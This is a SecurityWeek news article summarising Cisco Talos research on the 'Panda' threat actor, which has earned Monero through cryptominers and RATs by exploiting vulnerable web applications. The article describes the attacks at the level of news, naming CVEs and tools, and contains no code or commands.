Security Experts:

Connect with us

Hi, what are you looking for?



‘Panda’ Group Makes Thousands of Dollars Using RATs, Crypto-Miners

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.

Although not highly sophisticated, the actor, which Talos refers to as Panda, is highly active, focused on persistently exploiting vulnerable web applications worldwide. The actor’s tools allow it to traverse networks, while the use of RATs also puts organizations at risk of data theft.

The group is capable of updating its infrastructure and exploits on the fly and relies on exploits released by Shadow Brokers for infiltration, as well as the open-source credential-dumping application Mimikatz.

Initially associated with last year’s MassMiner campaign, the threat actor was shortly after linked to another widespread mining campaign that used a different set of command and control (C&C) servers. Panda has since updated not only the infrastructure, but also its portfolio of exploits and payloads.

The cybercriminals, Talos’ security researchers say, have been observed targeting organizations in multiple industries, including those in the banking, healthcare, transportation, telecommunications, and IT services sectors.

In July 2018, the actor was exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner associated with MassMiner. The hackers were mass-scanning for vulnerable servers and also attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). A PowerShell exploit was used to download a miner payload.

“In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000,” Talos says.

Panda was also observed using Gh0st RAT and dropping other hacking tools and exploits, including Mimikatz and exploits that the Shadow Brokers are said to have stolen from the National Security Agency (NSA).

Talos researchers spotted elements of the MassMiner attacks being used in a campaign that employed a different C&C server, suggesting that the same actor might have been behind both.

In January 2019, the threat actor was exploiting a flaw in the ThinkPHP web framework (CNVD-2018-24942) to spread similar malware. In March 2019, it was using new infrastructure, although the tactics, techniques, and procedures (TTPs) remained similar.

Soon after, Panda started employing an updated payload, which used the Certutil tool in Windows to download the secondary miner payload. Exploit modules designed for lateral movement were still used, many related to the NSA exploits.

Over the past month, Panda has updated its C&C and payload-hosting infrastructure, but the employed malware remains relatively similar to what was used in May 2019. In August, the hackers added another set of domains to their inventory, the researchers say.

“Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated,” Talos concludes.

Related: MassMiner Attacks Web Servers With Multiple Exploits

Related: Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.


The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Application Security

PayPal is alerting roughly 35,000 individuals that their accounts have been targeted in a credential stuffing campaign.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.